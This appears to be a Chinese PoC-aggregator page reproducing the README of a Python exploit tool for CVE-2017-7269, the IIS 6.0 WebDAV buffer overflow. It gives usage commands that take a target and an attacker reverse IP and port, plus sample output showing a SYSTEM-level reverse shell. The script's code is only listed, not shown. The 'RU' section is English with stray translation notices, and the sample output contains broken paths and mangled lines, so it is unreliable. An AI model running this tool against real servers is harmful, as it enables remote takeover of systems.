POC详情: 31c22ff8c01d4a7bece118b6a366259159c31e47

来源
关联漏洞
标题: Microsoft Internet Information Services 缓冲区错误漏洞 (CVE-2017-7269)
描述:Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数存在缓冲区溢出漏洞。远程攻击者可通过发送特制的PROPFIND请求利用该漏洞执行任意代码。
描述
PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.
介绍

# EN
**GenWebDavIISExploit** is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.

## Disclaimer

This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.

## Prerequisites

- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.

## Usage
### Command-Line Arguments

- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Usage Example

```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS-127.00.1 . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet mask . . . . . . . . . . . . . . . . : 255.255.255.0
      Main gateway . . . . . . . . . . . . . . . . : 192.168.1.1
    
```


## Notes
- Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
- Use this tool only on authorized systems to test for vulnerabilities.


# RU
**GenWebDavIISExploit** is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.

Translated with DeepL.com (free version)


## Disclaimer

This project is intended **for educational purposes only**. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Execution of remote code on vulnerable IIS6 WebDAV servers.
- Dynamic payload code generation with IP and port specification for the reverse connection.
- Simple command line interface for quick use.

## Requirements

- **Python 3.x**: Make sure you have Python 3 installed.
- **Network Access**: Ability to connect to the target machine's IP address and port.


## Usage

### Command line arguments

- **Target IP**: IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address to which the reverse connection should be established.
- **Reverse Port**: The port number on your system to receive the reverse connection.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Example usage

````bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

Translated with DeepL.com (free version)

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet Mask . . . . . . . . . . . . . . . : 255.255.255.0
      Default Gateway . . . . . . . . . . . . . . . . : 192.168.1.1
    
```


## Notes

- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.
文件快照

[4.0K] /data/pocs/31c22ff8c01d4a7bece118b6a366259159c31e47 ├── [ 15K] GenWebDavIISExploit.py ├── [1.0K] LICENSE └── [5.2K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。